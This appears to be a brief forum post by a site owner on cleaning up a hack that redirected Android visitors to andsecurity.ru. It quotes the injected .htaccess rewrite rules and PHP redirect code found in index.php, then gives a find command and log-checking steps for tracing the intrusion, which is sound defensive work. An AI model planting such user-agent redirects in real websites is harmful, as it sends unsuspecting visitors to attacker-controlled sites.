If You had any issue with redirecting your website to hacker website andsecurity.ru

check your hosting files modiffication dates (sort by mod. date)

i found this redirect is triggered from .htaccess and from index.php its on the top of the file.


RewriteEngine onRewriteCond %{HTTP_USER_AGENT} "Android" [NC]
RewriteRule ^(.*)$ http://andsecurity.ru [L,R=302]


if(stripos("***$ua",'android') !== false){
header("Location: http://andsecurity.ru");
* @package phpBB3
* @version $Id$
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License

if user agent contains phrasse Android, then website visitor probably using Android phone and it redirect him to hacker website

Also find files that are modiffied/created in same date or around it. For this i use linux command like this:

find /home/myusername/public-html -type f -name "*.php*" -newermt 2014-10-12 ! -newermt 2014-10-14

(it should find files modiffied in around 12-14 of October)

Next check your apache access_log file and find lines that correspond to the file modiffy date. You may find some more details about the person who injected the code.